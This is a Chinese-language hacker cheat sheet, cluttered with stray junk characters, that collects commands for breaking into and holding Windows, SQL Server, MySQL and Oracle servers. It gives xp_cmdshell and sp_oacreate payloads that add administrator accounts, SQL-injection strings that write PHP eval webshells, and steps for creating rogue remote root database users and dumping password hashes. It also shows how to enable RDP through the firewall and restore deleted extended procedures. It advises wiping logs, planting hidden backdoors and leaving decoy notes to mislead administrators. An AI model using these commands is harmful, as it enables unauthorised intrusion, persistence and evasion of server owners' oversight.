3 c" M6 l, X+ J# ]7 R# E" B1.net user administrator /passwordreq:no* _1 {& B3 o0 |# o) w# ~
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
) j9 B) I4 ~( r) m2.比较巧妙的建克隆号的步骤
8 o8 K8 |, J/ B8 d& o( o8 l先建一个user的用户; G: b: r- ^& G0 l: ^' G6 y
然后导出注册表。然后在计算机管理里删掉
" _8 V$ |; o5 P0 G在导入,在添加为管理员组
, h k7 d: T1 u8 t- P' H, v3.查radmin密码$ }& V# r5 C r" ?) X
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
8 q0 o `/ L @; J4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]/ Z! ^4 }6 K$ @% q: e' I$ ^: E$ Q
建立一个"services.exe"的项
8 R0 x" z% h% M7 n2 ^' Z# }) k! m再在其下面建立(字符串值)
% g" m6 c, p, L8 t键值为mu ma的全路径: t/ ]( B5 q, r! w6 N, \! k
5.runas /user:guest cmd4 c" m0 O7 x4 i: Z7 j
测试用户权限!
3 I' W8 h; Y: |* h8 Q5 W- {6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?7 C2 b q V& I
7.入侵后漏洞修补、痕迹清理,后门置放:3 ]. |: A$ J/ H! \, S' H
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门$ ?/ ^. q% Y! Y, ?- k1 @ F6 A
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
6 _6 v$ d4 C3 u) j
6 P$ ^+ Q+ n' `7 Y1 [for example
! W( w1 B8 `. x5 l8 h* z3 j7 v" }; |# q5 H8 o! S S& B( M) Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'* v r: U$ `6 }7 E- v
8 k3 O: w$ [. a% _" M2 d) t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
2 c" ]& m; O2 ~& O0 H! G6 D7 }' h- Y# L4 Z' F m5 g
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
( E0 W$ w% Z# q如果要启用的话就必须把他加到高级用户模式) C9 e& x( ~! s6 c& {
可以直接在注入点那里直接注入
, i# D3 f! A5 V: y% vid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--9 K$ s5 {4 w- [6 M0 D- f' E
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--6 M7 w5 d# p7 z. X( A
或者7 \& w% o/ x& q. D6 K6 b
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'& ^6 W1 @0 `; p# c8 a& D
来恢复cmdshell。
1 H8 N- \0 A7 o7 n8 ~
7 p# H# P$ c) G分析器
- n3 Q( G5 O8 O" J' i7 ~EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--$ g' H# ]$ P: [- ?
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
1 p* C3 n# w0 V( E10.xp_cmdshell新的恢复办法0 Y; B8 s2 \! G6 J
xp_cmdshell新的恢复办法
, [# i, x9 f) r' L# b- L( k扩展储存过程被删除以后可以有很简单的办法恢复:: u9 r4 ?, Z2 B. ]% O$ B- B
删除, S$ |- S- r9 j: `
drop procedure sp_addextendedproc* E% Q4 b. o1 U1 j8 }3 L
drop procedure sp_oacreate+ \+ z7 R, L" Y r" Q9 f
exec sp_dropextendedproc 'xp_cmdshell') {5 _; |1 A- \7 Q* @5 O" ]
7 Z! V6 R* H5 D, }. G- |. d6 u" K
恢复
$ f) N3 G1 r4 d: j# e8 sdbcc addextendedproc ("sp_oacreate","odsole70.dll")
3 I9 E/ e, Z c3 W" B/ Adbcc addextendedproc ("xp_cmdshell","xplog70.dll")
( P2 D0 S" I8 N: {" a0 o% k- S3 m+ x5 R% E0 C- V3 M! F: y
这样可以直接恢复,不用去管sp_addextendedproc是不是存在1 V+ @/ g, j- @( Z
* f5 F% Y. V2 n$ k( h9 a( |-----------------------------/ c2 G6 w8 {# A/ O1 R$ r& o$ z- M
9 t+ O+ ~+ r1 m. {
删除扩展存储过过程xp_cmdshell的语句:, D7 Z6 q Y3 O2 O+ ~; E
exec sp_dropextendedproc 'xp_cmdshell'3 K$ h9 u/ y# Y% E3 c$ l% I: P
& C& l0 k, ^4 j' t n8 A' p
恢复cmdshell的sql语句
7 M6 F; A# t( T. h1 Qexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll', h5 x4 ~! Y+ z0 S' q, Q
( a0 L: [- x2 m( Y/ P: b1 q3 E
, A$ Q4 l2 }( k' w3 J
开启cmdshell的sql语句
2 @+ M# F; X0 g1 S( M! t7 y7 o+ H5 y9 Y2 {% U* ^ m$ ~
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
- r- G! [8 X8 j1 s* Y
2 ]4 b+ |" e: s( q判断存储扩展是否存在
- F4 a" Z7 m y# C1 U% Aselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
, e( q5 V I* Q+ W9 S- I返回结果为1就ok
$ P* h! ?' X- [: ]+ ?$ w
1 E- v: ?% R7 ?4 q8 |4 o) g恢复xp_cmdshell
" i8 u+ u# j* v/ Y5 }exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
4 v; T/ m# A+ s8 ^- S. L+ w2 P返回结果为1就ok' O6 V4 @3 z, _+ J: g
: @- J' m# A3 }- Y9 X+ o& o, `否则上传xplog7.0.dll" m+ _& r! @. R% I* o; w; h
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'" b6 C3 i' b7 E+ y# h9 I0 G
7 E% g, G7 @4 Y* A堵上cmdshell的sql语句
' {) l2 _/ R9 m9 l% R4 esp_dropextendedproc "xp_cmdshel
# ~2 x. q4 _1 N1 N9 }+ x7 P/ E. i-------------------------0 T( y% }9 Y) h1 @" B; Q
清除3389的登录记录用一条系统自带的命令:3 X! S+ K# `0 `$ y0 k2 R3 z7 W
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
c- _& T8 N1 i8 A5 J0 v: C* `. w9 H- [: D$ b
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
3 H; N- h" W$ C0 ^( K+ O) M q在 mysql里查看当前用户的权限
; q* V8 }! u' @9 H5 {+ D, K3 Sshow grants for 4 T3 V8 Q) d8 o/ `# N
- v" }! k0 E/ {& o L以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
5 k: S0 l0 N/ U. q) @
7 x( [6 [/ i" q( b7 |# J; D3 t0 \) r
) F/ g' o- `6 D4 A! Y9 `# g+ q; b$ S. o9 vCreate USER 'itpro'@'%' IDENTIFIED BY '123';
7 S% t5 N4 c, X! v O9 c
$ E9 Q( h- j2 V% [- p0 RGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION5 m" a/ C" N4 T9 M4 ?) ?6 Y% [
2 c0 Q2 ~2 P9 \7 z, |& F5 gMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
2 H6 i0 G: {, A6 a* e0 \+ p# N F: M
! y, g1 K3 W2 v* h4 M9 tMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 k t- G: [3 P9 G
0 T2 {8 J) S& F- p搞完事记得删除脚印哟。1 {3 A! ]# y; @5 _$ z x6 x2 c
4 h: g1 X+ V& L8 F7 v1 l4 ]Drop USER 'itpro'@'%';
1 }7 N/ E' P4 [+ `1 `4 }% o2 g8 |+ M P1 d2 Q
Drop DATABASE IF EXISTS `itpro` ;! Y3 `2 X0 x/ K( y |' \
0 d9 B! `. o, K) a: S' {& G当前用户获取system权限4 s6 I) @! d B5 S8 r* f" t- L
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact5 z# W! c% e ~! P8 R8 Z% D, n% E2 D
sc start SuperCMD4 d, b9 r% i: V$ w9 Q7 T
程序代码5 y5 v) f: H& F# W" V* Z) O, P
<SCRIPT LANGUAGE="VBScript">7 f8 c4 L! G, \& q1 e# [
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
" ^, s R B$ [: ]% J; k' _os="WinNT://"&wsnetwork.ComputerName% c; d) q3 e" w! S: k2 D
Set ob=GetObject(os)2 V! J; Z/ y [1 z1 D$ \- `
Set oe=GetObject(os&"/Administrators,group"), k4 }, A& C. L8 ^. s
Set od=ob.Create("user","nosec") `# Q6 r$ h# P& S) j1 k& j5 v" K
od.SetPassword "123456abc!@#"
5 K, J' e% E0 Z9 eod.SetInfo5 U h& v% X; _8 e
Set of=GetObject(os&"/nosec",user)7 a1 R+ n6 q+ p; m
oe.add os&"/nosec"
7 q/ k" ?! I- |( z6 N/ N1 G</Script>- E5 w t6 U& w/ R( X# I
<script language=javascript>window.close();</script>2 ]# x) K, f6 K2 H. y* s( M1 T9 y4 F
# Y' B3 ^1 E d7 F
8 {( G7 h' e" }9 \' F( b- }6 B8 n9 s8 x+ |
& H) w1 Z4 ~$ ~; D* X; G( j突破验证码限制入后台拿shell
L$ Q4 x( @" W( e% F2 ?, V$ ?5 T! M5 y6 v3 |程序代码
+ E- M' p; t/ t# {/ T, uREGEDIT4 ) o6 X F- m& t$ W3 b- P
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
. Q2 U, D& [; U"BlockXBM"=dword:00000000
) I- Q. O$ |0 k$ k5 n( l* p5 }5 U
3 C! N3 v3 ^7 Q2 y' H( k: p保存为code.reg,导入注册表,重器IE: v- b G/ S' m3 u& R
就可以了
' N' g1 |! r9 z# b, Bunion写马
8 A% J2 z) n- y/ ~5 x2 }- U2 |" Q程序代码9 V6 _9 D) h- e) b# T1 _
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*6 Z* N7 M8 Q3 J1 K- W% c$ w1 z
5 W' e8 V C; n; J# o
应用在dedecms注射漏洞上,无后台写马
& [4 F1 _5 d2 w1 p- p+ v2 [dedecms后台,无文件管理器,没有outfile权限的时候
/ j- {2 H% u. d5 _, x5 r在插件管理-病毒扫描里
6 K$ g8 S& e* L V6 F2 W/ c" n写一句话进include/config_hand.php里
7 V& Z) Z4 B1 u* T程序代码
# D2 {+ g Y" q>';?><?php @eval($_POST[cmd]);?>
& \: S. k! Q- _$ V' U
. U4 }$ M9 M9 g; k7 p; J* _4 L/ H# x- D3 J# v# r i n O7 t
如上格式
+ k/ x6 R$ }# l0 M( V
$ M# [+ x+ O3 foracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
8 j- Z! }; O7 N) s+ P程序代码
( f/ l8 j' n+ k4 ^( Uselect username,password from dba_users;
( d8 G, l. s3 W' \* q+ Z' {9 U, i0 ^! M: B5 k/ O# W8 M6 [6 M
4 R- L1 O: S( l+ @( ~4 ^; lmysql远程连接用户
5 N: A- K p4 F# N9 k+ }: l( Y) n程序代码
4 b$ X+ J2 z0 M& H
3 G! c w+ g: e( T, jCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
( y! g# @/ c1 F* cGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
3 N# ?0 @3 V+ ~4 hMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
! w ?5 m5 B! {7 YMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;9 H3 R- }. V7 p2 x$ R" M
* M& d, |; H( R# f" J
; i9 l4 O. n; v* g
: L7 |4 W- I) ~/ x" Z
+ ^$ k8 P( f& L1 A) v* L% ~/ iecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 09 S$ H+ O! C2 m8 r! Z9 {: y
' h% C5 x+ Z. y; ?2 z# J1 b: r1 B
1.查询终端端口7 m0 V. M1 U% |$ }& p
9 T% _* A- |- @xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
/ Q! w6 J$ U3 g( G7 u7 M5 _0 u
) V* Z) c% i# j1 L e1 g3 g4 t通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"7 f! {7 s2 V2 ]# t# k; i+ w8 c! }
type tsp.reg( Y% { V7 {( s, `
5 @2 ?- j( M) c! w2.开启XP&2003终端服务% u* ?% L( z- Q
( J% `8 k9 V# W; e7 h8 Q F
! R2 D9 E* W# a5 X$ |7 oREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
" I) ]) g- j. a2 }2 C" Z6 A
( B) p8 n. E) o; U( T0 l7 [* p4 f; T- L% t. |, c0 u
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
a, k, P6 {0 Z% B. g
8 ^2 h0 }) [4 B& C, a3.更改终端端口为20008(0x4E28)2 _2 g9 I- z! k, v) l- J2 k
! h, k9 u, j" F& M( N" g5 a5 O8 |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
: f, G6 o. r& }' l( H! a
4 _" H. T) i: v) iREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f5 X1 w4 q. z& |* x& ]$ y
: m! {7 ^, S, c# P3 D% G
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
0 S) |9 f0 r' e5 i6 Y# s( I2 S$ a) V4 k0 y/ _
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f$ R+ K8 ^% x' V
4 o" C- _1 b; X; G$ x
V9 C6 f# Z+ k& @1 ~. ~& B X5.开启Win2000的终端,端口为3389(需重启)
- K( G' H0 _: S+ a$ U- J1 p6 O
. R' [" Q% g$ e3 ^- n/ i& e6 C) lecho Windows Registry Editor Version 5.00 >2000.reg
5 h4 r0 m) J7 iecho. >>2000.reg
, z0 R3 ]# K- | w3 ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
, ~! e. ^! G7 V- b" V2 J! k$ kecho "Enabled"="0" >>2000.reg 2 S8 \, A& x4 H ^: p
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
9 H0 U! ~) L: i( Fecho "ShutdownWithoutLogon"="0" >>2000.reg 8 e8 s* E' j& w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
3 i/ ?; p& \; cecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
! ?1 [! j! t0 q$ A) pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg / d) k6 u5 ^: g1 ~( q* `1 u
echo "TSEnabled"=dword:00000001 >>2000.reg
9 G) w: ~& L) iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg $ s% w' f5 U& [* _1 c- V6 |. n
echo "Start"=dword:00000002 >>2000.reg . D+ \3 M! L4 K0 M, f% k1 i5 ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
. p% D6 z1 |) `& v( M& ]: `echo "Start"=dword:00000002 >>2000.reg
# b$ G% }% E; jecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
8 R* e) x. L" O8 D* u; s8 Hecho "Hotkey"="1" >>2000.reg 0 D, ]. ?4 Y3 M+ a0 ~, \" I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg # `8 e/ }2 M0 k# v! s" o
echo "ortNumber"=dword:00000D3D >>2000.reg 6 K# b1 B( i8 v, [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
! z3 [1 P$ p0 H& {5 A) l% p1 }echo "ortNumber"=dword:00000D3D >>2000.reg
3 e% v& }. m6 d G
) h, k: `0 Z1 w7 f( E+ T! B6 m6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
- i8 H( `# h1 D& A4 ^$ G- T# p
2 l" ^+ [# u& G* X! Q) X/ b@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
1 e$ V8 T4 Z7 }' x& K(set inf=InstallHinfSection DefaultInstall)* `- S; J, n3 ?7 y8 `
echo signature=$chicago$ >> restart.inf
# z) |2 ]1 n3 [- F0 recho [defaultinstall] >> restart.inf
5 a2 p, p5 v/ Srundll32 setupapi,%inf% 1 %temp%\restart.inf# x: E9 g z, }2 A! K
8 R, k4 X* F7 y4 q
8 u7 ^. S c5 \4 E* g- G7.禁用TCP/IP端口筛选 (需重启)5 \2 b" X2 W5 B: ~& E
9 {7 _8 c$ J8 o* _6 X0 l* C0 N* n6 bREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
% r8 f/ U+ P* A+ O8 J2 J8 A( b1 ~- a3 m0 Z$ `
8.终端超出最大连接数时可用下面的命令来连接
6 w4 w: j+ a; O7 M
; n( [" j# G* Xmstsc /v:ip:3389 /console$ t$ G0 t, p6 J8 s0 [2 v5 G$ b
4 Q: t3 \+ b. Z9 V( P1 E! }+ e
9.调整NTFS分区权限
; i) [, l. _* N" L* p5 R
/ D" p* h2 v- [ Dcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
/ s4 R$ B6 L4 n2 M' K+ s
( Y2 e7 h6 G( S" c# C- Icacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)8 y8 m2 ~9 L: a/ O9 D0 w0 E
5 W0 r3 F5 v& s4 Z4 ~' }- G! M- E
------------------------------------------------------
/ Y/ e. H# J6 U- l4 V" d* Q' Z( e3389.vbs & k* S7 `7 Y/ |
On Error Resume Next% n3 ?& h$ w0 a( h3 `
const HKEY_LOCAL_MACHINE = &H80000002+ [; v' Q }8 x6 o8 ]: O% v
strComputer = "."
4 H( X8 u: J: H6 zSet StdOut = WScript.StdOut
6 v0 N* c3 A/ h# `Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
, L$ L" ^$ m* V2 TstrComputer & "\root\default:StdRegProv"): v3 {0 @9 F, K& l- p9 ^7 Q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server", O& S6 F4 Z1 r% S
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
4 Z. E# Y! }( `* B9 astrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp", I5 B3 ^: q" ~" s# R" g( `
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
5 h' O# n8 b' S9 |6 F/ t0 sstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
t/ a! P7 Q9 B; P1 jstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
1 g6 I% D1 p6 O8 jstrValueName = "fDenyTSConnections"
! S/ L! ]3 {2 I9 J/ X* g* k3 OdwValue = 0+ \/ y3 n' F9 j% b
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
* ?0 s5 B/ Z$ e5 L- w2 T& M/ BstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
* W2 ^$ Z+ Y' o& R+ b) z5 N/ fstrValueName = "ortNumber"
+ N0 ]" k$ Q& g Q4 x7 V7 }dwValue = 3389
9 R2 k- F( Y: E" m: U* ?: ?oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. i9 r1 ~& ]0 ]" \% DstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
$ N! r- z! a( [) |+ pstrValueName = "ortNumber"
5 n; [' J( H" h7 z- JdwValue = 3389: l H3 L0 D, K' a- L8 j
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
% T* S4 v5 V y$ @( kSet R = CreateObject("WScript.Shell") 1 n6 _+ m8 \, D( a1 N
R.run("Shutdown.exe -f -r -t 0")
$ @% J5 M) F% n+ {
' Q9 ^- I; t/ q0 i$ {0 q删除awgina.dll的注册表键值8 q0 ]* W; T! O" N% t0 [
程序代码
& k! o) W6 T7 D& T4 H' D1 t; e: w) S( u. T+ T7 e$ `0 k
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f7 b: y. C9 Z6 n+ n
* k0 S# y! Q! G! ]7 C' W$ i8 n8 o2 i) u. _+ {" v0 n( x
$ T: \8 x" l2 ~- V
9 m. M. X( `8 z( r% X程序代码& a2 a# w' ~$ @. n6 S! O% M/ o
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
. o7 L1 V! a R) G" C2 ^
# g9 {+ M$ ?; f6 C$ j* }! E设置为1,关闭LM Hash; P, e% L ~; a" O+ c, Q S
. v& d, ~! A, O3 j7 r数据库安全:入侵Oracle数据库常用操作命令$ X. X2 l( ~9 {( W. u! n
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。# Q q- j' f( \6 _" c
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
, i5 `9 k; P2 M' O' j# ]# V& m2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
c" I0 C P, E/ b" p3、SQL>connect / as sysdba ;(as sysoper)或
! V9 b; { g; h1 g- rconnect internal/oracle AS SYSDBA ;(scott/tiger)
b. P c- [2 _) ~conn sys/change_on_install as sysdba;" G. I& W2 v5 z2 h; L
4、SQL>startup; 启动数据库实例. n4 L) h& |! g9 r2 K/ z. h
5、查看当前的所有数据库: select * from v$database;. ]* _/ C. N7 w; `& F4 I5 J# e
select name from v$database;. V2 W) Q4 z1 n. B( x a& V& y
6、desc v$databases; 查看数据库结构字段
# [* W! V1 G) l7 F2 O7 Y7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
3 Z) @$ `/ A1 n+ JSQL>select * from V_$PWFILE_USERS;
% C- X: T% ~* ` N$ j3 zShow user;查看当前数据库连接用户+ h% s& x' V$ ?1 m( \" a
8、进入test数据库:database test;% D0 `! S, j( Z' b+ W7 T; \- L$ E
9、查看所有的数据库实例:select * from v$instance;
0 O3 N7 M. k! e5 q如:ora9i" _! h1 t P3 I
10、查看当前库的所有数据表:
4 N( J9 m4 E" @9 Z) c) h+ H5 PSQL> select TABLE_NAME from all_tables;
1 m3 Y& Z+ M1 B2 z- G/ [7 a1 kselect * from all_tables;
8 P- R6 }" g/ R- }1 Q5 U8 }, a: r& dSQL> select table_name from all_tables where table_name like '%u%';/ z0 y+ F5 Z, I8 A5 Q- m
TABLE_NAME
. d8 u/ S Q6 S' q- b------------------------------
, b* b2 @4 C! h" Q+ P_default_auditing_options_, ~/ T, F9 @5 G$ E
11、查看表结构:desc all_tables;
; o- l6 ?: ~2 b( N9 K5 C8 t12、显示CQI.T_BBS_XUSER的所有字段结构:
, \7 n4 { a# t7 }, \* b$ pdesc CQI.T_BBS_XUSER;
3 {0 X# \# x( X: h4 Q13、获得CQI.T_BBS_XUSER表中的记录:
8 N2 a- W0 t% n" `4 ]select * from CQI.T_BBS_XUSER;
0 } l$ N% _* W14、增加数据库用户:(test11/test); q8 C) Z& s2 W3 z
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;( e0 `8 ~5 C3 `3 l- V- ]
15、用户授权:
+ V& a W5 V7 U/ rgrant connect,resource,dba to test11;9 n; h1 A. B% q z
grant sysdba to test11;% N0 \2 S& E4 \
commit;
% u1 k- `* N" Y$ c* S16、更改数据库用户的密码:(将sys与system的密码改为test.)
# V9 u$ N1 f( v6 A$ ealter user sys indentified by test;: h& x P! ^" r$ u: T7 Z% U7 _
alter user system indentified by test;
! J' o9 o; g2 m6 [# }# F6 l' U
+ ?# f3 c' ^4 k1 |5 UapplicationContext-util.xml
- I1 R! y7 M+ a$ u4 papplicationContext.xml
$ G* j1 y, e+ I9 i1 L) Sstruts-config.xml" ?# ~; L; A! O$ i- U! V& c3 {4 O
web.xml
# t* v2 J0 A7 |) k2 t8 Bserver.xml
, K/ R# @, f# Btomcat-users.xml$ J7 z; l% J2 A9 w3 }/ ?6 N" }
hibernate.cfg.xml4 N5 L2 m% O5 k( D/ |
database_pool_config.xml
$ C! v6 o+ a* f8 C* s
, Y2 T2 @' D4 o1 `6 e, P$ ~4 C+ h
W7 N% m5 |! B/ N' T\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
- \" N& }* Y9 e2 n6 v\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini6 E2 v* n* q# b3 K6 P: ^
\WEB-INF\struts-config.xml 文件目录结构
+ H8 J# Y) G+ z3 h
; z' A' Y4 t5 B. S) S9 Tspring.properties 里边包含hibernate.cfg.xml的名称
1 |; S" R" P' T
' E& |. i/ l7 ^. b6 s4 ~9 c+ r9 M6 O& w }1 L2 r% i7 d
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
. \! D( N1 Y3 O! w2 f( G' C4 B g" }2 |* c! A% C
如果都找不到 那就看看class文件吧。。
5 {8 `( |/ p. u! X& Z& }, W4 b+ g) ?( x* q
测试1:4 S" ]0 a& d4 ?7 G3 X) p4 Z$ f
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
1 y4 @* l( c5 R+ T! d/ R+ Q" Q5 B4 B$ N* ?. R
测试2:. a7 C- q/ h# z' E" H$ I
/ b1 \ w5 \( screate table dirs(paths varchar(100),paths1 varchar(100), id int)
3 O! h7 S4 X/ J9 t% r- i2 p& |7 R$ {0 E
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--0 H" K( b4 {7 }$ r! e9 H
5 N+ }& C x5 J0 q. ]SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1# K1 @5 u: v' R2 |4 e! a. v
7 M* v7 x- l7 {/ d! ?; e
查看虚拟机中的共享文件:' d2 O Q5 z2 J/ C! |- x4 o, V
在虚拟机中的cmd中执行
4 \7 n) H0 l; j5 W1 p S. \\\.host\Shared Folders7 j; m% ~# @& O2 X% q* _8 k8 b
. H* A) m5 \8 R
cmdshell下找终端的技巧
0 {9 n+ N' u0 r+ f6 Y2 a找终端: + S9 h4 }2 I$ m4 g+ x/ L/ j
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
; ~9 }& H/ F& j# J s3 w; l 而终端所对应的服务名为:TermService 5 s9 `1 L, y/ ]) Q% a
第二步:用netstat -ano命令,列出所有端口对应的PID值!
5 N/ t+ j# M$ H 找到PID值所对应的端口
; d1 x0 i' p8 `& c' t/ A
4 H4 w( {; d: S+ ?, o) J |3 m: n查询sql server 2005中的密码hash
